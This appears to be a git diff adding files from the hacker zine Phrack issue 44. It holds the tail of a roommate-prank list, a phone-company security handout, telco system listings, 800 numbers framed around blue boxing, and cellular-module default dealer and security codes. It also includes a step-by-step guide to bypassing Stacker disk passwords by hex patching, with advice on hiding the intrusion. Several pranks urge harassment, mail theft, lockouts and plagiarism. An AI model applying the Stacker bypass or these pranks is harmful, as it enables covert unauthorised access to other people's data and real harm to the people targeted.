+24.  Smile.  All the time.
+
+25.  Collect dog shit in baby food jars.  Sort them according to what you
+     think the dog ate.
+
+26.  Burn all your waste paper while eying your roommate suspiciously.
+
+27.  Hide a bunch of potato chips and Ho Hos in the bottom of a trash can.
+     When you get hungry, root around in the trash.  Find the food, and eat it.
+     If your roommate empties the trash before you get hungry, demand that s/he
+     reimburse you.
+
+28.  Leave a declaration of war on your roommate's desk.  Include a list of
+     grievances.
+
+29.  Paste boogers on the windows in occult patterns.
+
+30.  Shoot rubber bands at your roommate while his/her back is turned, and
+     then look away quickly.
+
+31.  Dye all your underwear lime green.
+
+32.  Spill a lot of beer on his/her bed.  Swim.
+
+33.  Bye three loaves of stale bread.  Grow mold in the closet.
+
+34.  Hide your underwear and socks in your roommate's closet.  Accuse
+     him/her of stealing it.
+
+35.  Remove your door.  Ship it to your roommate's parents (postage due).
+
+36.  Pray to Azazoth or Zoroaster.  Sacrifice something nasty.
+
+37.  Whenever your roommate walks in, wait one minute and then stand up.
+     Announce that you are going to take a shower.  Do so.  Keep this up for
+     three weeks.
+
+38.  Array thirteen toothbrushes of different colors on your dresser.
+     Refuse to discuss them.
+
+39.  Paint your half of the room black.  Or paisley.
+
+40.  Whenever he/she is about to fall asleep, ask questions that start with
+     "Didja ever wonder why...."  Be creative.
+
+41.  Shave one eyebrow.
+
+42.  Put your mattress underneath your bed.  Sleep down under there and pile
+     your dirty clothes on the empty bedframe.  If your roommate comments,
+     mutter "Gotta save space," twenty times while twitching violently.
+
+43.  Put horseradish in your shoes.
+
+44.  Shelve all your books with the spines facing the wall.  Complain loudly
+     that you can never find the book that you want.
+
+45.  Always flush the toilet three times.
+
+46.  Subsist entirely on pickles for a week.  Vomit often.
+
+47.  Buy a copy of Frankie Yankovic's "Pennsylvania Polka," and play it at
+     least 6 hours a day.  If your roommate complains, explain that it's an
+     assignment for your primitive cultures class.
+
+48.  Give him/her an allowance.
+
+49.  Listen to radio static.
+
+50.  Open your window shades before you go to sleep each night.  Close them
+     as soon as you wake up.
+
+51.  Cry a lot.
+
+52.  Send secret admirer notes on your roommate's blitzmail.
+
+53.  Clip your fingernails and toenails and keep them in a baggie. Leave the
+     baggie near your computer and snack from it while studying. If he/she
+     walks by, grab the bag close and eye him/her suspiciously.
+
+54.  Paste used kleenexes to his/her walls.
+
+55.  Whenever your roomate comes in from the shower, lower your eyes and
+     giggle to yourself.
+
+56.  If you get in before your roomate, go to sleep in his/her bed.
+
+57.  Put pornos under his/her bed. Whenever someone comes to visit your
+     roommate when they're not home, show them the magazines.
+
+58.  Whenever you go to sleep, start jumping on your bed . . . do so for a
+     while, then jump really high and act like you hit your head on the ceiling.
+     Crumple onto your bed and fake like you were knocked out . . . use this
+     method to fall asleep every night for a month.
+
+59.  If your roommate goes away for a weekend, change the locks.
+
+60.  Whenever his/her parents call and ask for your roommate, breathe into the
+     phone for 5 seconds then hang up.
+
+61.  Whenever he/she goes to shower, drop whatever you're doing, grab a towel,
+     and go shower too.
+
+62.  Find out your roommate's post office box code.  Open it and take his/her
+     mail.  Do this for one month. After that, send the mail to him/her by UPS.
+
+63.  Collect all of your pencil shavings and sprinkle them on the floor.
+
+64.  Create an imaginary cat for a pet.  Talk to it every night, act like
+     you're holding it, keep a litter box under your desk.  After two weeks,
+     say that your cat is missing.  Put up signs in your dorm, blame your
+     roommate.
+
+65.  Call safety & security whenever your roommate turns up his/her music.
+
+66.  Follow him/her around on weekends.
+
+67.  Sit on the floor and talk to the wall.
+
+68.  Whenever the phone rings, get up and answer the door.
+
+69.  Whenever someone knocks, answer the phone.
+
+70.  Take his/her underwear.  Wear it.
+
+71.  Whenever your roommate is walking through the room, bump into him/her.
+
+72.  Stare at your roommate for five minutes out of every hour.  Don't say
+     anything, just stare.
+
+73.  Tell your roommate that someone called and said that it was really
+     important but you can't remember who it was.
+
+74.  Let mice loose in his/her room.
+
+75.  Give each of your walls a different name.  Whenever you can't answer a
+     problem, ask each of your walls.  Write down their responses, then ask
+     your ceiling for the final answer.  Complain to your roommate that
+     you don't trust your ceiling.
+
+76.  Take your roommate's papers and hand them in as your own.
+
+77.  Skip to the bathroom.
+
+78.  Take all of your roommate's furniture and build a fort.  Guard the fort
+     for an entire weekend.
+
+79.  Gather up a garbage bag full of leaves and throw them in a pile in
+     his/her room.  Jump in them.  Comment about the beautiful foliage.
+
+80.  When you walk into your room, turn off your lights.  Turn them on when
+     you leave.
+
+81.  Print up satanic signs and leave them in your room where he/she
+     can find them.
+
+82.  Whenever you're on the phone and he/she walks in, hang up immediately
+     without saying anything and crawl under your desk.  Sit there for
+     two minutes than call whoever it was back.
+
+83.  Insist on writing the entire lyrics to American Pie on your ceiling above
+     your bed.  Sing them every night before you go to bed.
+
+84.  Use a bible as Kleenex.  Yell at your roommate if they say Jesus or God
+     Damnit.
+
+85.  Burn incense.
+
+86.  Eat moths.
+
+87.  Buy Sea Monkeys and grow them.  Name one after your roommate.  Announce
+     the next day that it died.  Name another one after your roommate.
+     The next day say that it died.  Keep this up until they all die.
+
+88.  Collect Chia-Pets.
+
+89.  Refuse to communicate in anything but sign language.
+
+90.  Eat a bag of marshmallows before you go to bed.  The next day, spray
+     three bottles of whipped cream all over your floor.  Say you got sick.
+
+91.  Wipe deodorant all over your roommate's walls.
+
+92.  If you know that he/she is in the room, come barging in out of breath.
+     Ask if they saw a fat bald naked Tibetan man run through carrying a
+     hundred dollar bill.  Run back out swearing.
+
+93.  Leave apple cores on his/her bed.
+
+94.  Keep feces in your fridge.  Complain that there is never anything to eat.
+
+95.  Piss in a jar and leave it by your bed.  When your roommate isn't looking,
+     replace it with a jar of apple juice.  Wait until your roommate turns
+     around.  Drink it.
+
+96.  Don't ever flush.
+
+97.  Buy an inflatable doll.  Sleep with it.
+
+98.  Hang stuffed animals with nooses from your ceiling.  Whenever you walk by
+     them mutter, "You shouldn't have done that to me."
+
+99.  Lick him/her while they are asleep.
+
+100. Dress in drag.
+
+*******************************************************************************
diff --git a/phrack44/4.txt b/phrack44/4.txt
new file mode 100644
index 0000000..be5e2f2
--- /dev/null
+++ b/phrack44/4.txt
@@ -0,0 +1,887 @@
+                         ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Four, File 4 of 27
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                PART II
+******************************************************************************
+
+<Retyped From an Actual SWBT Handout>
+
+SOUTHWESTERN BELL TELEPHONE
+
+Computer
+Security
+Guidelines
+
+Computer Security is YOUR Responsibility.
+
+These guidelines are designed to help you know and meet your corporate
+obligation.
+
+Prepared by:  Information Systems
+              Computer Security Administration
+              One Bell Center 22-H-8
+              St. Louis, MO 63101
+
+For Users
+---------
+
+Keep your logon and password information private.
+Do not write down passwords, but if you must, keep them in a locked place.
+Do not store your password in the computer.
+Make sure no on sees you enter your passwords.
+Pick non-obvious, non-guessable passwords.
+Do not share your logons or passwords.
+Change passwords periodically, at least every thirty days.
+Open new computer logons for computer resources only when you have a
+  real need.
+Close computer logons you no longer need.
+Make sure you have proper protection settings on sensitive computer files.
+Do not send confidential information through electronic mail or computer
+  news systems.
+If you suspect security violations, tell management immediately.
+Be sure that use of computing resources is for company approved purposes
+  only.
+Do not access any information that your management has not authorized you
+  to have.  When in doubt, ask!
+Logoff when you leave your terminal.
+If you dialed in, disconnect when you are finished working.
+
+For Managers of Computing Facilities
+------------------------------------
+
+Provide procedures to control access to computing resources.
+Provide facilities to let users protect proprietary information from
+  disclosure to unauthorized persons.
+Be sure that connection of a computer to any network does not diminish
+  the control a user has over programs and data.
+Provide appropriate security facilities and procedures to protect
+  computing hardware against damage.
+Provide facilities to protect user's data and programs from undesired
+  changes or destruction.
+Ensure that computing resource use has been authorized by a member of
+  supervision.
+Make sure that computing resource use can be tracked to individuals.
+Report to managers regularly on the extent of computing resource use.
+Provide appropriate backup facilities for data and programs.
+Provide audit trails which identify violations and security breaches
+  and examine them regularly.
+For assistance in coordinating computer security activities, contact the
+  Computer Security Administrator.
+
+For Managers
+------------
+
+Make sure you authorize all use of computing resources and that you require
+  separate logons for each individual.
+Make sure that the user of computer resources understands responsibilities
+  with respect to proper use and security consciousness.
+Review computing resource usage reports and the security practices of the
+  users for which you are responsible.
+When a user's employment or need for access ends or changes, make sure
+  access to computer resources is promptly changed by notifying your
+  System Administrator.
+Report security violations to the General Security Manager and to the
+  Computer Security Administration Group.
+
+For Information
+---------------
+
+The Information Systems Organization provides security and disaster recovery
+  services to establish, monitor, and audit computer security standards.
+If you have any comments or questions regarding computer security, please
+  contact the Computer Security Administration.
+
+*******************************************************************************
+
+                     RBOC ORGANIZATIONAL ARCHITECTURE
+
+                               Compiled By
+
+                             Phrack Magazine
+
+
+In an effort to assist the hacking world in their understanding of the
+organizational mess created by our fabulous friends at the RBOCs, we have
+compiled a list of the various organizations, what their functions are,
+which centers they are made up of, and which computer systems they use.
+
+-----------------------------------------------------------------------------
+
+                         Planning and Engineering
+
+            Defines network resources available for assignment
+
+Functions:
+
+  Long range and current planning for outside plant, wire centers,
+    interoffice network, special services, interexchange access
+    services, and message trunks
+  Exchange network design
+  Coordination of activities connected with installation and/or modification
+    of exchange network components
+
+Centers:
+
+  DSPC
+  SCPC
+  WCFPC
+  CAC
+  IFFPC
+  IFCPC
+  TEC
+  MEC
+  DSDC
+  EEC
+  CSEC
+
+Systems:
+
+  LEIS
+  NPS
+  FEPS
+  LSRP
+  INPLANS
+  INFORMS
+  DFDS
+  SSFS
+  PICS
+  LATIS
+  CAMIS
+  CUCRIT
+
+-----------------------------------------------------------------------------
+
+                           Service Provisioning
+
+              Allocates assignable existing network resources
+
+Functions:
+
+  Circuit design and routing
+  Verification and assignment of network elements
+  Controlling and tracking orders during assignment process
+
+Centers:
+
+  CPC - Circuit Provisioning Center
+  LAC - Loop Assignment Center
+
+Systems:
+
+  TIRKS
+  SOAC
+  SWITCH
+  COSMOS
+  WM
+  LFACS
+  LOMS
+
+-----------------------------------------------------------------------------
+
+                             Network Operations
+
+           Controls installation, maintenance and testing of circuits
+
+Functions:
+
+  Coordination and performance of the activities required to provide service
+  Surveillance and control of network equipment and facilities
+  Analysis, sectionalization, and repair of switching and transmission
+    facilities
+  Status reporting on service order and/or service restoration activities
+
+Centers:
+
+  CRSAB
+  ICC
+  MC
+  NAC
+  RCMAC
+  SEAC
+  SSC
+  FMAC
+  STC
+  DNCC
+  FCC
+  SCC
+
+Systems:
+
+  McTE
+  GDS
+  LMOS
+  EADAS
+  TAN
+  RSA
+  CRAS
+  CIMAP
+  NDS
+  SEAS
+  MAS
+  MIZAR
+  SARTS
+  TCAS
+  CAROT
+  NMA
+  NMPS
+  SCCS
+
+-----------------------------------------------------------------------------
+
+                               Customer Services
+
+                     Direct company contact with customers
+
+Functions:
+
+  Service negotiation with customers
+  Creating and routing associated service orders
+  Creating and maintaining customer records
+  Reporting the provisioning status to customers
+  Initiating billing and collection processes
+  Handling billing and general service inquiries
+
+Centers:
+
+  RSC - Residence Service Center
+  BSC - Business Service Center
+  ICSC - Interexchange Carrier Service Center
+
+Systems:
+
+  BOFADS - Business Office Force Administration Data System
+  PREMIS - Premises Information System
+  SOP - Service Order Processor
+  CABS - Carrier Access Billing System
+  BOSS - Billing and Order Support System
+  CRIS - Customer Records Information System
+  BRIS - Business Revenue Information System
+  CLAIMS
+
+-----------------------------------------------------------------------------
+
+                            Quick Breakdown
+
+Process                    Center                   System
+-----------------------------------------------------------------------------
+
+Planning & Engineering
+
+    IOF                    IFCPC  IFFPC  IOF/EDC    FEPS  NPS-F
+
+    Switch                 SCPC  WCPC  EEC          LSD&F  LSRP  NDS
+                                                    TNDS/EQ  NPS-W
+
+    Distribution           DSPC  DSDC               LATIS  LEIS  NPS-D
+
+Service Provisioning
+
+     IOF                   CAC                      TIRKS
+
+     Switch                LAC                      COSMOS
+
+     Distribution          LAC                      LFACS
+
+Network Operations
+
+     IOF                   FMAC                     CAROT   CIMAP   TCAS
+                                                    TNDS/TK
+
+     Switch                NAC  RCMAC  SCC          EADAS  NDS  MAS  MIZAR
+                                                    TASC  CIMAP  NMA  NMPS
+                                                    SCCS
+
+     Distribution          ICC  MC                  GDS  CRAS  LMOS/MLT
+                                                    PREDICTOR  TAN
+
+*******************************************************************************
+
+    -IS- Blue Boxing Dead?
+
+Australia Direct        800-682-2878
+Austria Direct          800-624-0043
+Belgium Direct          800-472-0032
+Belize Direct           800-235-1154
+Bermuda Direct          800-232-2067
+Brazil Direct           800-344-1055
+British VI Direct       800-248-6585
+Cayman Direct           800-852-3653
+Chile Direct            800-552-0056
+China Direct            800-532-4462
+Costa Rica Direct       800-252-5114
+Denmark Direct          800-762-0045
+El Salvador Direct      800-422-2425
+Finland Direct          800-232-0358
+France Direct           800-537-2623
+Germany Direct          800-292-0049
+Greece Direct           800-443-5527
+Guam Direct             800-367-4826
+HK Direct               800-992-2323
+Hungary Direct          800-352-9469
+Indonesia Direct        800-242-4757
+Ireland Direct          800-562-6262
+Italy Direct            800-543-7662
+Japan Direct            800-543-0051
+Korea Direct            800-822-8256
+Macau Direct            800-622-2821
+Malasia Direct          800-772-7369
+Netherlands Direct      800-432-0031
+Norway Direct           800-292-0047
+New Zealand Direct      800-248-0064
+Portugal Direct         800-822-2776
+Panama Direct           800-872-6106
+Philippines Direct      800-336-7445
+Singapore Direct        800-822-6588
+Spain Direct            800-247-7246
+Sweden Direct           800-345-0046
+Taiwan Direct           800-626-0979
+Thailand Direct         800-342-0066
+Turkey Direct           800-828-2646
+UK Direct               800-445-5667
+Uruguay Direct          800-245-8411
+Yugoslavia Direct       800-367-9841 / 9842
+
+This file brought to you by The Phone Company
+
+*******************************************************************************
+
+              *****************************************
+              * Step-by-step Programming Instructions *
+              *      For the EO Cellular Module       *
+              *****************************************
+
+1.  Unbox and attach the EO Cellular Module to the EO Personal
+    Communicator 440/880.
+
+2.  Once the EO Cellular Module is attached turn on the EO Personal
+    Communicator 440/880.
+
+3.  Open EO Phone.
+
+4.  Tap "Options."
+
+5.  Tap "Authorized Dealer."
+
+6.  Write Dealer Code in space provided.  Dealer code is *12345678#.  To edit
+    mistakes, draw a small circle around 2 or 3 of the numbers entered.
+    This will bring up an edit box and allow easier entry of the number.
+    Once you have made your corrections, tap "OK."
+
+7.  Tap "OK" on the "Authorized Dealer Code" pop-up.
+
+8.  Wait approx. 30 seconds and programming screen will appear (The "busy
+    clock" will appear on screen).
+
+9.  If invalid code entry screen appears, the programming screen will be
+    blank and the "Apply" and "Apply and Close" buttons at the bottom
+    will be greyed out.  Close the programming screen by tapping on the
+    upper left blacked out corner of the screen.  Re-do steps 4 through 7
+    (refer to the TIP below for a guaranteed method of accurate entry).
+    A common problem is to enter an "l" instead of a "1" because they appear
+    to be very similar.  To make sure that you have entered a one, check to
+    see that the character is the same height as the other numbers.  The
+    letter "l" will be slightly taller.
+
+TIP:  To insure that you have entered the correct digits (one versus letter
+      "l" problem above) you can use the accessories keyboard.  To use the
+      keyboard for the Dealer Code entry do the following (replaces steps
+      4, 5, and 6 above):
+
+      a.  Tap Accessories in the lower bookshelf.
+      b.  Tap Keyboard.  This will bring up the pop-up keyboard.
+      c.  Tap Options at the top of the EO Phone window.
+      d.  Tap Authorized Dealer.  This will bring up the Dealer Code pop-up.
+      e.  Tap on the line in the Dealer Code box.  A dot (or character) will
+          appear and now entry from the keyboard will appear in the Dealer
+          Code box.
+      f.  Now use the keyboard to delete the dot (or character).  The Delete
+          key is the upper right most key on the keyboard.
+      g.  Now use the keyboard to enter the dealer code - *12345678#
+          (the * and the # keys can be found by tapping the shift
+          (up arrow) keys.)
+      h.  GO TO STEP 7 and continue.
+
+NOTE:  When programming the following entries always use the circle gesture
+       to change the entry.  In other words, circle the existing entry
+       to bring up the edit combs.  Then correct each digit by writing over
+       the existing digit.  This will insure that the number of digits for
+       each entry is correct.  If an entry has an incorrect length then
+       none of the programed entries will be accepted.
+
+10.  Enter the assigned telephone number in the first field.  Use the
+     circle gesture to bring up the edit combs to edit the existing
+     telephone number.  Change each digit by writing over it in the edit
+     combs.  When complete tap "OK."
+
+11.  Use the same procedure in step 10 to enter the appropriate SID
+     in the second field.
+
+12.  Use the same procedure in step 10 to enter the corresponding IPCH
+     (0333 for the non-Wireline or A side provider; 0334 for the Wireline
+     or B side provider) in the third field.
+
+13.  Leave the remaining fields intact as already programed from the
+     factory unless instructed to change them by the cellular service
+     provider.  Use the circle/edit method to change any necessary
+     entries.  The factory defaults are:
+
+     Field Title        Default Value
+     -----------        -------------
+     ACCOLC             00
+     Group ID           15
+     Lock Code          1234
+     SCM                1010
+     Security Code      123456
+     Emergency Code     911
+
+14.  Tap the "Apply" button on the bottom of the screen.  The programming
+     information you have entered is now being saved in the EO Cellular
+     Module.  This will take approximately 20 seconds.
+
+15.  Close the programming screen by tapping the blackened area in the upper
+     left hand corner of the programming screen.
+
+16.  Now set the approximate Roaming Option.
+
+17.  Tap Options.
+
+18.  Tap Roaming.
+
+19.  Enter Security Code.  Default is 123456.
+
+20.  Tap "OK."
+
+21.  Tap next to appropriate roaming option.  A check mark will appear.
+
+22.  Tap "Apply" button.
+
+23.  Close window.
+
+24.  Check status line in EO Phone for appropriate indications.
+
+25.  Tap "Keypad" tab on right side of EO Phone window.  This will bring
+     up a keypad display which can be used to place a voice call.
+
+26.  Make sure that the Cellular Icon is boxed (as opposed to the Phone
+     Icon in the lower left hand of EO Phone.)
+
+27.  Tap the keypad buttons to enter the number to be dialed.  The digits will
+     appear in the dial box at the middle bottom of the EO Phone window.
+
+28.  Pick up the handset and tap "DIAL" button in the lower right hand
+     corner of the screen.  This button is just like hitting SEND button
+     on a cellular phone.  This will place a voice call using the number
+     in the dial box.
+
+29.  When call is complete tap "Hang-up" (the DIAL button to "Hang-up" after
+     the call is connected to the network.)  This is just like pressing END
+     on a cellular phone.
+
+30.  Close EO Phone.
+
+31.  Programming and testing is now complete.
+
+Helpful Information
+
+The EO Cellular Module contains an OKI 910 cellular phone housed in
+specially designed, plated plastics with custom connections into the
+proprietary port on the phone.
+
+All programming of this module is done via the EO Personal Communicator
+440 or 880.  All programming/configuration information for the phone is
+stored in the EO Cellular Module and not in the Personal Communicator.
+This means that once the EO Cellular Module is programed it can be removed
+from the EO Personal Communicator and reattached to any other EO Personal
+Communicator without re-programming.
+
+The ESN for the EO Cellular Module can be derived from the Serial number
+in the window on the bottom of the module.  The cellular module ESN is 129
+followed by the last eight digits of the serial number in the window.  These
+eight digits will usually begin with 013.  This eleven digit number should
+be provided to the people that will actually assign the telephone number
+and activate the EO Cellular Module on the cellular network.
+
+*******************************************************************************
+
+THE HACKER CHRONICLES CD-ROM
+
+Well, he said he was going to do it, and he did.
+
+Scan Man put out a CD-ROM of info collected from the
+underground.  I had kind of forgotten he was going to
+do it, but once I heard rumors of such a thing, I knew he
+had.
+
+At HoHo Con last year, Bootleg was very excited about
+compiling data from the community for the project he
+and Scan Man were working on.  As things progressed
+however, Bootleg would soon find out that Scan Man
+had no intention of working with him, and cut him out of
+the project.
+
+This is how it was explained to me.  I hope that it is
+not true, since Bootleg is back in jail and wouldn't
+have the ability to fly out to West Virginia and throttle
+Scan Man about the head and neck.
+
+[Description from the Jewel Box]
+
+WARNING!
+
+This material is controversial in nature and may be offensive
+to some viewers.  Not that the information in and of itself is
+not illegal.  Quite often the usage of certain information is
+illegal.  The Hacker Chronicles is for informative and educational
+purposes only.  All documents and programs in this compilation were
+legally available to the public prior to his publication.  None of
+these criminal acts described on this disc are in any way
+condoned or should be attempted.
+
+  Over 12 YEARS in the making - this software package contains stories
+  of how they did it, actual break-ins, arrests, and prosecutions.  Most
+  of the articles were written by the actual people who committed these
+  acts.  Access articles and software with an easy-to-use menu system.
+
+  Areas of information include:  PHONE PHREAKING (so called hobbyists
+  who are into telephone technology of all types, well known for their
+  ability to bypass telephone billing system), COMPUTER HACKERS
+  (sometimes referred to as cyberpunks, interested in access to any on
+  line computer system they can find), SATELLITE COMMUNICATIONS
+  (hobbyists who sometimes employed test software designed for dealers
+  to defeat scrambling systems), "UNDERGROUND" GENERAL INFORMATION (many
+  subjects all very technical in nature and explained in detail, such as
+  ATM's, credit cards, voice mail, hypnotism, bugging, skip tracing,
+  phone taps, cellular phones, lock picking, social engineering,
+  virus's, chemical substances, explosives, editorials, legal issues,
+  alarm systems, spies, hardware, signal interception, private
+  investigations, security, computer ethics, underground BBS's, TV cable
+  piracy, boxing and much more!
+
+-----
+
+Uh, that kinda says it all, don't it?  CYBERPUNKS, VIRII, WAREZ & STUFF!
+Uh, yeah.
+
+Seriously, the disk itself has a shitload of files.  This
+is rather cool, since now EVERY bbs in the world can put
+OVER 650 MEGS OF G-FILES!  Heh.
+
+The file on the disc that struck me the most was the
+intro written by Scan Man.  He went talked about
+a lot of things he's done in the past with the scene,
+telephone companies, etc.  I know Scan Man from WAY back.
+Pirate-80 was one of the first real Hacker BBSes I was
+ever on.  (Remember when it was only up certain hours of the day?)
+Reading that file was pretty informing for me.  It also
+made me smile to see that he's still pissed off at Craig
+for tearing him apart in a Phrack some years ago.
+
+Remember, this is by no means a complete collection.
+Thankfully, the CD does not have any issues of Phrack
+magazine past issue 41 (or else, I would be enjoying
+a piece of the revenue :) ).  It also, oddly enough,
+does not have any LOD-TJ other than 4.  It DOES however
+have a large collection of CUD, NIA & CDC.  Go figure.
+
+The files do represent a neat history of our community
+and for the curious neophyte, the nostalgic old-timer, or
+anyone with 39 bucks, it might be something worth picking
+up just to say you have it.  I mean, you never know when
+you will need to find issue 12 of LOL, or plans for a
+urine box.  It will save you the trouble of downloading.
+
+The Hacker Chronicles - A Tour of the Computer Underground
+should be available from any outlet that carries CD-ROMS.
+Or hell, call P-80.  I'm sure Scan Man will sell you a copy:
+304-744-7322.
+
+*******************************************************************************
+
+Packet Switched Data Networks
+An Introduction and Overview
+By: Cosmos
+
+
+The abundance of networks both private and public has given the hacker
+an almost infinite playground.  A popular type of network is the
+packet switched network like SprintNet (TELENET) that allows local
+users to access non-local machines.  These WAN's usually serve as
+the backbone for many large corporations.  Understanding the way
+in which they operate can aid many aspects of the hacker's knowledge.
+
+Packet switching is a data networking technology in which user data is
+segmented into small units (packets) and transmitted from the sending
+user to the receiving user over shared communications channels.  Each
+individual packet also holds additional information that allows the
+network to correctly route the packet to the correct destination.  The
+size of the packet is limited to a maximum number of characters set by
+the individual sender.  Packets are measured in octets, which are 8-bit
+bytes.  User data that exceeds this amount is divided into multiple
+packets.
+
+The difference between packet switching and circuit switching
+(regular telephone lines) lies in the use of virtual circuits.
+These circuits are given the term "virtual" because:
+
+ 1)  they are made up of bandwidth allocated on demand from
+     a pool of shared circuits
+
+ 2)  no direct physical connection is made on a packet network
+
+ 3)  the connection is a logical one
+
+Due to these facts, packet networks are commonly denoted as connectionless
+networks.  There are three types of packet networks:  public, private, and
+hybrid (a combo of the two previous ones).
+
+A packet switched data network (PSDN) has five major components:
+
+1) local access components (LAC)
+2) packet assemblers/disassemblers (PAD)
+3) packet switching nodes (PN)
+4) network links (NL)
+5) a network managment system (NMS)
+
+LOCAL ACCESS COMPONENTS
+
+To transmit data through a PSDN, the data must first move from the
+end-user to a packet assembler/dissasembler (PAD) or to a packet
+switching node with a built-in PAD function.  In order to achieve
+this, three local access components are required.  First is the
+end-user data terminal, or more plainly, your computer.  Secondly,
+an end-user transmission device such as a modem.  Thirdly, a
+local access facility or physical line (Telephone Line).  There are
+three types of physical lines: switched analog lines (dial up), leased
+analog channels (private lines), and leased digital channels (DDS circuits).
+
+PACKET ASSEMBLERS/DISASSEMBLERS
+
+All data travelling through the PSDN must be routed through a
+Packet Assembler/Disassembler (PAD).  The PAD's primary function
+is to translate user data into network packet format and conversely to
+convert network packets into user data.  Basically, a PAD serves
+as the network translator between the user and the PSDN.  Other functions
+performed by the PAD include: physical line concentration, call setup
+and clearing functions, protocol conversion, code conversion, protocol
+emulation, local switching functions, and local call billing functions.
+
+PACKET SWITCHING NODES
+
+The primary component of a packet switching network is the packet
+switching node (PN).  The packet switching node ensures that each
+packet is routed properly through the network.  Commonly, PN
+configurations are installed in a redundant configuration.  This
+provides for a convenient backup for network traffic.  Other functions
+include: call billing, internal network diagnostics, support of
+direct host computer access., and inter-network gateway connections.
+
+NETWORK LINKS
+
+Network links are the physical components that connect packet switching
+nodes together.  Several transmission technologies can be employed
+in network linking, including:  analog circuits, digital circuits,
+microwave systems, and satellite systems.  The most common network
+link technologies used are Digital Dataphone and other similar
+interexchange carrier services, and point to point analog private
+lines.  Speeds on network links range from 9.6 Kbps to 56/64 Kbps.
+Network links are commonly denoted as the "backbone layer" or
+the backbone packet network.  The local PAD's are termed the
+"access layer" or access network.
+
+NETWORK MANAGEMENT SYSTEM
+
+Basically, the network management system (NMS) controls and monitors
+the PSDN.  It primarily stores and performs maintenance on the
+network database.  This database is the master copy of all the software
+and configurations in each network node.  If a node fails or is
+not functioning properly, the NMS can download backup information through
+the various network links to solve the problem.  Thus, a unattended
+network is formed.
+
+This is all one needs to understand for a general knowledge of
+a packet switched data network.  Additional topics can be
+pursued further for increased knowledge but are not essential.
+You might want to research some info on the standard X.25 protocol,
+and other OSI stuff.  Anyways, I hope this brief intro article can
+be of use in the general knowledge of computer networking.
+
+Cosmos
+
+*******************************************************************************
+
+   Stacker Security.
+
+
+How to Hack a Stacker disk that is password protected!
+
+The 'Stacker' Software increases the space on your hard disk by using
+on the fly compression on the data on the disk.  It does this by creating
+a file called Stacvol.dsk on the hard drive.  All of the information that
+is put on the disk is compressed and stored in the stacvol.dsk file.
+When Stacker is installed on a hard drive, say C: all of the data on
+the disk is compressed and stored in the stacvol.dsk file, which is
+assigned as a virtual disk C:, the 'real' drive is then assigned D:.
+The swapping taking place a boot time.
+
+The Stacvol.dsk file is therefore stored on the D: drive and usually
+takes up most of the drive. (ie: a 40M C: drive contains the stacvol.dsk
+file of size around 5-39M the disks are swapped at boot time and
+the C: drive that the user 'sees' is really the contents of the stacvol.dsk
+file on the D drive assigned to C:, everything on the C drive (stacvol.dsk)
+is compressed, thus obtaining an increased disk space.)
+
+The point is this, at boot time the owner of the machine can set passwords
+to allow the user to have no access, read/write or read-only access to
+the C drive/stacvol.dsk file, if a wrong password is entered the stacvol
+file is not mounted as the C drive and all a DIR will get you is a directory
+of C:\ which will have a few files such as command.com etc, nothing
+of any real interest.
+
+So now for the interesting bit, how to get in without a password,
+or getting read/write privs when you've only got read-only.
+
+First, boot the computer and go through the password routine.
+Get it wrong (you may as well try something like password though just in
+case.)
+
+The Stacvol.dsk file is hidden so change its file attributes so you
+can edit it. (You'll need a floppy now with a utility such as Norton
+diskedit on it)
+
+Load in the diskeditor and get it so that you are editing the stackvol
+file in a HEX mode.  The first bit of Hex just contains the usual sort of
+boot record type rubbish, not too interesting.
+
+The interesting bit is the bit which starts at offset 74
+
+Now the information starting at 00040 is the interesting bit,
+on a disk with a password set it will look like this....
+
+00040   20 20 20 20 20 20 20 20 | 20 20 2D 2A 2D 0A 0A 1A
+00050   72 AA 91 9C 0F 66 9A ED | AB 18 6E 6D E2 C3 2B 8B
+00060   5E CD EF A9 37 1B 53 E2 | C6 F0 E8 9C A4 49 F6 9D
+00070   4C F0 AB 32 21 47 FC 91 | 7E 8C 58 D8 D9 D7 DB D3
+
+(All figures obviously in hex.)
+
+The data from 0004B to 0004E is a flag to the device driver to tell
+it that a password is required.
+
+From 0004f to 0005F are the encrypted passwords.
+(the rest just being data)
+
+NOW, for an unpassworded file this looks like
+
+00040   20 20 20 20 20 20 20 20 | 20 20 20 20 20 0D 0A 1A
+00050   49 F6 9D 4E EC B1 26 3D | 0F 6B B2 24 41 07 7B 92
+00060   XX XX XX XX XX XX XX XX | XX XX XX XX XX XX XX XX
+00070   XX XX XX XX XX XX XX XX | XX XX XX XX XX XX XX XX
+
+Now all you have to do is take a copy of the data in this section
+on the stacvol.dsk file you are hacking so that you can return it back to
+its original state!
+
+Patch the code above into the corresponding positions into the
+file you are hacking, leaving the code denoted by XX alone, this is version
+code and depends on the machine so leave it alone!
+
+Save the changes and reboot the machine, it will no longer ask for a
+password and you now have full access.
+
+Afterwards re-patch the original code that you noted and if you've used
+your common sense then the owner will never know you were there.
+
+(By common sense I mean don't forget to restore time/date stamps etc.)
+
+D2A  [D
+
+*******************************************************************************
+
+                       UNAUTHORIZED ACCESS ONLY
+
+Computers are becoming an integral part of our everyday existence.  They are 
+used to store a multitude of information, from credit reports and bank
+withdrawals to personal letters and highly sensitive military documents.
+So how secure are our computer systems?
+
+The computer hacker is an expert at infiltrating secured systems, such as 
+those at AT&T, TRW, NASA and the DMV.  Most computer systems that have a 
+telephone connection have been under seige at one time or another, many 
+without their owner's knowledge.  The really good hackers can re-route the
+telephone system, obtain highly sensitive coporate and government documents,
+download individuals credit reports, make free phone calls globally, read 
+private electronic mail and corporate bulletins and get away without ever 
+leaving a trace.
+
+So who are these hackers?  Just exactly WHAT do they DO, and WHY do they do
+it?  Are they really a threat?  What do they do with the information 
+they obtain?  Are hackers simply playing an intellectual game of chess or
+are hackers using technology to effectively take control of corporate and 
+government systems that have previously appeared omnipotent?
+
+Our group is in the course of filming "Unauthorized Access", a documentary 
+that will demistify the hype and propoganda surrounding the computer hacker.  
+We will expose the truths of this sub-culture focusing on the hackers 
+themselves.  This will be a view from inside the global underground.  
+We intend to shoot in the United States, Holland and Germany.
+
+This documentary will be of the highest broadcast quality and is 
+intended for international television, festival and theatrical distribution.
+
+We are currently looking for additional financial backers interested in this
+project. For more information about "Unauthorized Access" or if 
+you are intrested in providing any information or support, please contact 
+annaliza@netcom.com.
+
+*******************************************************************************
+
